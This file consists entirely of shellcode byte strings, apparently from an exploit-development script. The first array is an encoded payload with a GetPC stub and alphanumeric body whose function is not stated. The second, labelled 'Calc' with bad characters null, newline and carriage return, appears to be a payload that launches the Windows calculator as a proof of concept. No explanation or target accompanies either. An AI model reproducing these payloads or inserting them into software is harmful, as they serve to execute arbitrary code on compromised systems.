"\xd9\xc0\xd9\x74\x24\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x39"
"\x6c\x6b\x58\x4f\x72\x33\x30\x77\x70\x45\x50\x43\x50\x6f\x79"
"\x38\x65\x75\x61\x6b\x70\x30\x64\x4c\x4b\x42\x70\x66\x50\x4e"
"\x6b\x63\x62\x66\x6c\x6c\x4b\x42\x72\x46\x74\x4e\x6b\x63\x42"
"\x34\x68\x76\x6f\x4c\x77\x32\x6a\x65\x76\x36\x51\x6b\x4f\x4e"
"\x4c\x77\x4c\x70\x61\x51\x6c\x55\x52\x34\x6c\x71\x30\x59\x51"
"\x7a\x6f\x46\x6d\x55\x51\x58\x47\x7a\x42\x68\x72\x66\x32\x66"
"\x37\x4c\x4b\x71\x42\x52\x30\x4c\x4b\x72\x6a\x47\x4c\x6e\x6b"
"\x30\x4c\x54\x51\x61\x68\x38\x63\x51\x58\x55\x51\x58\x51\x52"
"\x71\x6c\x4b\x51\x49\x61\x30\x35\x51\x4e\x33\x6c\x4b\x42\x69"
"\x36\x78\x4a\x43\x34\x7a\x57\x39\x6e\x6b\x55\x64\x6e\x6b\x46"
"\x61\x78\x56\x64\x71\x6b\x4f\x6e\x4c\x7a\x61\x38\x4f\x64\x4d"
"\x76\x61\x38\x47\x64\x78\x4b\x50\x51\x65\x49\x66\x36\x63\x51"
"\x6d\x7a\x58\x55\x6b\x53\x4d\x36\x44\x33\x45\x4d\x34\x51\x48"
"\x4e\x6b\x73\x68\x55\x74\x45\x51\x4b\x63\x71\x76\x4e\x6b\x76"
"\x6c\x30\x4b\x4e\x6b\x52\x78\x37\x6c\x56\x61\x58\x53\x4c\x4b"
"\x56\x64\x4e\x6b\x66\x61\x5a\x70\x6c\x49\x30\x44\x64\x64\x55"
"\x74\x73\x6b\x53\x6b\x70\x61\x33\x69\x70\x5a\x30\x51\x59\x6f"
"\x4b\x50\x61\x4f\x43\x6f\x73\x6a\x6e\x6b\x64\x52\x4a\x4b\x6c"
"\x4d\x71\x4d\x51\x7a\x77\x71\x6c\x4d\x6d\x55\x78\x32\x45\x50"
"\x73\x30\x53\x30\x50\x50\x33\x58\x66\x51\x4e\x6b\x70\x6f\x6c"
"\x47\x49\x6f\x4e\x35\x4d\x6b\x38\x70\x6c\x75\x4f\x52\x62\x76"
"\x62\x48\x69\x36\x6e\x75\x6f\x4d\x6f\x6d\x59\x6f\x5a\x75\x45"
"\x6c\x33\x36\x43\x4c\x47\x7a\x6b\x30\x79\x6b\x59\x70\x53\x45"
"\x73\x35\x4f\x4b\x62\x67\x72\x33\x71\x62\x30\x6f\x70\x6a\x57"
"\x70\x62\x73\x6b\x4f\x4b\x65\x32\x43\x50\x61\x72\x4c\x65\x33"
"\x64\x6e\x72\x45\x43\x48\x53\x55\x33\x30\x41\x41"

# Calc \x00\x0a\x0d
"\xba\x27\xe4\xad\x97\xd9\xea\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x28\x06\x58\x6b\xde\x44"
"\xa3\x94\x1e\x29\x2d\x71\x2f\x69\x49\xf1\x1f\x59\x19\x57\x93"
"\x12\x4f\x4c\x20\x56\x58\x63\x81\xdd\xbe\x4a\x12\x4d\x82\xcd"
"\x90\x8c\xd7\x2d\xa9\x5e\x2a\x2f\xee\x83\xc7\x7d\xa7\xc8\x7a"
"\x92\xcc\x85\x46\x19\x9e\x08\xcf\xfe\x56\x2a\xfe\x50\xed\x75"
"\x20\x52\x22\x0e\x69\x4c\x27\x2b\x23\xe7\x93\xc7\xb2\x21\xea"
"\x28\x18\x0c\xc3\xda\x60\x48\xe3\x04\x17\xa0\x10\xb8\x20\x77"
"\x6b\x66\xa4\x6c\xcb\xed\x1e\x49\xea\x22\xf8\x1a\xe0\x8f\x8e"
"\x45\xe4\x0e\x42\xfe\x10\x9a\x65\xd1\x91\xd8\x41\xf5\xfa\xbb"
"\xe8\xac\xa6\x6a\x14\xae\x09\xd2\xb0\xa4\xa7\x07\xc9\xe6\xad"
"\xd6\x5f\x9d\x83\xd9\x5f\x9e\xb3\xb1\x6e\x15\x5c\xc5\x6e\xfc"
"\x19\x39\x25\x5d\x0b\xd2\xe0\x37\x0e\xbf\x12\xe2\x4c\xc6\x90"
"\x07\x2c\x3d\x88\x6d\x29\x79\x0e\x9d\x43\x12\xfb\xa1\xf0\x13"
"\x2e\xc2\x97\x87\xb2\x2b\x32\x20\x50\x34"
